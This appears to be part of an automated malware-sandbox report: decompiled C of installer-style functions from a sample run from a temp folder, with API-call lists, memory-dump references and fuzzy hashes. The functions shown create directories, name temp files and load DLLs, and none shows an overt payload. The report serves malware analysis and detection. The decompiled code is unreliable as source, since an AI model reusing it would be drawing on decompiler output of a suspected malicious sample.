				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E00405564(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004054FB(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                          0x004015b3
                                                                                                                          0x004015ba
                                                                                                                          0x004015bd
                                                                                                                          0x004015c2
                                                                                                                          0x004015c6
                                                                                                                          0x004015c8
                                                                                                                          0x004015d0
                                                                                                                          0x004015d6
                                                                                                                          0x004015d8
                                                                                                                          0x004015db
                                                                                                                          0x004015e3
                                                                                                                          0x004015f0
                                                                                                                          0x004015fd
                                                                                                                          0x004015fd
                                                                                                                          0x004015f2
                                                                                                                          0x004015f3
                                                                                                                          0x004015fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004015fb
                                                                                                                          0x004015f0
                                                                                                                          0x00401600
                                                                                                                          0x00401603
                                                                                                                          0x00401605
                                                                                                                          0x00401606
                                                                                                                          0x004015c8
                                                                                                                          0x0040160d
                                                                                                                          0x0040162d
                                                                                                                          0x00402164
                                                                                                                          0x0040160f
                                                                                                                          0x00401611
                                                                                                                          0x0040161c
                                                                                                                          0x00401622
                                                                                                                          0x00401622
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405572
                                                                                                                            • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                                            • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 3751793516-1104044542
                                                                                                                          • Opcode ID: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                          • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                                                                                                          • Opcode Fuzzy Hash: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                          • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004056E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004056E3(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                          0x004056e7
                                                                                                                          0x004056ed
                                                                                                                          0x004056ee
                                                                                                                          0x004056ee
                                                                                                                          0x004056ef
                                                                                                                          0x004056f6
                                                                                                                          0x00405700
                                                                                                                          0x0040570d
                                                                                                                          0x00405710
                                                                                                                          0x00405718
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040571c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040571e
                                                                                                                          0x00000000
                                                                                                                          0x0040571e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 004056F6
                                                                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-1843804530
                                                                                                                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                          • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                                                                                                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                          • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1000198F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E1000198F(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				 *0x10004060 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E);
				_push(1); // executed
				_t34 = E10001D3B(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100023F6(_t50);
					}
					E10002440(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100025FE(_t65, _t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100018A1(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100025FE(_t65, _t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100025FE(_t65, _t50);
							_t34 = GlobalFree(E1000159E(E100018A1(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E100025C4(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E10001825( *0x10004054);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E100014C7(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000120C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E100027CC(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                                                                          0x1000198f
                                                                                                                          0x1000198f
                                                                                                                          0x1000198f
                                                                                                                          0x10001999
                                                                                                                          0x100019a1
                                                                                                                          0x100019ae
                                                                                                                          0x100019bc
                                                                                                                          0x100019bf
                                                                                                                          0x100019c1
                                                                                                                          0x100019c6
                                                                                                                          0x100019cb
                                                                                                                          0x10001ade
                                                                                                                          0x10001ade
                                                                                                                          0x100019d1
                                                                                                                          0x100019d5
                                                                                                                          0x100019d8
                                                                                                                          0x100019dd
                                                                                                                          0x100019df
                                                                                                                          0x100019e5
                                                                                                                          0x100019eb
                                                                                                                          0x10001a1b
                                                                                                                          0x10001a22
                                                                                                                          0x10001a46
                                                                                                                          0x10001a85
                                                                                                                          0x10001a48
                                                                                                                          0x10001a48
                                                                                                                          0x10001a49
                                                                                                                          0x10001a4c
                                                                                                                          0x10001a52
                                                                                                                          0x10001a56
                                                                                                                          0x10001a59
                                                                                                                          0x10001a5e
                                                                                                                          0x10001a5e
                                                                                                                          0x10001a65
                                                                                                                          0x10001a6b
                                                                                                                          0x10001a71
                                                                                                                          0x10001a7d
                                                                                                                          0x10001a7e
                                                                                                                          0x10001a81
                                                                                                                          0x10001a24
                                                                                                                          0x10001a25
                                                                                                                          0x10001a3a
                                                                                                                          0x10001a3a
                                                                                                                          0x10001a8f
                                                                                                                          0x10001a92
                                                                                                                          0x10001a9f
                                                                                                                          0x10001aa6
                                                                                                                          0x10001aae
                                                                                                                          0x10001ab1
                                                                                                                          0x10001ab1
                                                                                                                          0x10001aae
                                                                                                                          0x10001abe
                                                                                                                          0x10001ac6
                                                                                                                          0x10001acb
                                                                                                                          0x10001abe
                                                                                                                          0x10001ad3
                                                                                                                          0x00000000
                                                                                                                          0x10001ad5
                                                                                                                          0x00000000
                                                                                                                          0x10001ad6
                                                                                                                          0x10001ad3
                                                                                                                          0x100019ef
                                                                                                                          0x100019f2
                                                                                                                          0x10001a10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001a13
                                                                                                                          0x10001a18
                                                                                                                          0x10001a18
                                                                                                                          0x10001a1a
                                                                                                                          0x00000000
                                                                                                                          0x10001a1a
                                                                                                                          0x100019f4
                                                                                                                          0x100019f5
                                                                                                                          0x100019fd
                                                                                                                          0x100019fe
                                                                                                                          0x00000000
                                                                                                                          0x100019fe
                                                                                                                          0x100019f7
                                                                                                                          0x100019f8
                                                                                                                          0x10001a06
                                                                                                                          0x00000000
                                                                                                                          0x10001a06
                                                                                                                          0x100019fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100019fb

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001A3A
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 10001AB1
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001AD6
                                                                                                                            • Part of subcall function 100023F6: GlobalAlloc.KERNEL32(00000040,E8002080), ref: 10002428
                                                                                                                            • Part of subcall function 100027CC: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,?,10001A0B,00000000), ref: 1000281C
                                                                                                                            • Part of subcall function 100018A1: lstrcpyA.KERNEL32(00000000,10004018,00000000,10001967,00000000), ref: 100018BA
                                                                                                                            • Part of subcall function 100025FE: wsprintfA.USER32 ref: 1000265F
                                                                                                                            • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 10002728
                                                                                                                            • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 10002751
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767494692-3916222277
                                                                                                                          • Opcode ID: 6e0759a576b18076926cce8c598bb7c3c4ce6d2cf8641f24577731197bddaade
                                                                                                                          • Instruction ID: 73a644c0497f06cd708a10c3248ea791f84cf5318f3d9e6ca3c0cc3a1fe5f0c9
                                                                                                                          • Opcode Fuzzy Hash: 6e0759a576b18076926cce8c598bb7c3c4ce6d2cf8641f24577731197bddaade
                                                                                                                          • Instruction Fuzzy Hash: 8031A075601245AAFB41DF649CC5BDA3BE8FF062D0F148429F9066A09FCF749845CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401F51, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f38");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f08 =  *0x423f08 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404D7B(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af50, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004034C6(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                          0x00401f51
                                                                                                                          0x00401f51
                                                                                                                          0x00401f56
                                                                                                                          0x00401f5d
                                                                                                                          0x00402019
                                                                                                                          0x00402164
                                                                                                                          0x00402164
                                                                                                                          0x0040288b
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a
                                                                                                                          0x0040289a
                                                                                                                          0x00401f6c
                                                                                                                          0x00401f76
                                                                                                                          0x00401f79
                                                                                                                          0x00401f88
                                                                                                                          0x00401f8c
                                                                                                                          0x00401f92
                                                                                                                          0x00401f96
                                                                                                                          0x00402012
                                                                                                                          0x00000000
                                                                                                                          0x00402012
                                                                                                                          0x00401f98
                                                                                                                          0x00401fa2
                                                                                                                          0x00401fa6
                                                                                                                          0x00401fea
                                                                                                                          0x00401fa8
                                                                                                                          0x00401fab
                                                                                                                          0x00401fae
                                                                                                                          0x00401fde
                                                                                                                          0x00401fb0
                                                                                                                          0x00401fb3
                                                                                                                          0x00401fbc
                                                                                                                          0x00401fbe
                                                                                                                          0x00401fbe
                                                                                                                          0x00401fbc
                                                                                                                          0x00401fae
                                                                                                                          0x00401ff2
                                                                                                                          0x00402007
                                                                                                                          0x00402007
                                                                                                                          0x00000000
                                                                                                                          0x00401ff2
                                                                                                                          0x00401f7c
                                                                                                                          0x00401f82
                                                                                                                          0x00401f86
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                            • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                                            • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2987980305-0
                                                                                                                          • Opcode ID: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                          • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                                                                                                          • Opcode Fuzzy Hash: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                          • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401389, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423eb0; // 0x486e74
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42366c =  *0x42366c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42366c, 0x7530,  *0x423654), 0);
					}
				}
				return 0;
			}












                                                                                                                          0x0040138a
                                                                                                                          0x004013fa
                                                                                                                          0x00401392
                                                                                                                          0x0040139b
                                                                                                                          0x004013a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004013a2
                                                                                                                          0x004013a3
                                                                                                                          0x004013ad
                                                                                                                          0x00000000
                                                                                                                          0x00401404
                                                                                                                          0x004013b0
                                                                                                                          0x004013b7
                                                                                                                          0x004013bd
                                                                                                                          0x004013be
                                                                                                                          0x004013c0
                                                                                                                          0x004013c2
                                                                                                                          0x004013b9
                                                                                                                          0x004013b9
                                                                                                                          0x004013ba
                                                                                                                          0x004013ba
                                                                                                                          0x004013c9
                                                                                                                          0x004013cb
                                                                                                                          0x004013f4
                                                                                                                          0x004013f4
                                                                                                                          0x004013c9
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: tnH
                                                                                                                          • API String ID: 3850602802-801150485
                                                                                                                          • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                          • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                                                                                                          • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                          • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403097, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00403097(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405C3F(_t6);
				_t2 = E0040553D(_t6);
				if(_t2 != 0) {
					E004054D0(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056E3("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                          0x00403098
                                                                                                                          0x0040309e
                                                                                                                          0x004030a4
                                                                                                                          0x004030ab
                                                                                                                          0x004030b0
                                                                                                                          0x004030b8
                                                                                                                          0x004030c4
                                                                                                                          0x004030ca
                                                                                                                          0x004030ae
                                                                                                                          0x004030ae
                                                                                                                          0x004030ae

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                            • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 4115351271-3512041753
                                                                                                                          • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                          • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                                                                                                          • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                          • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

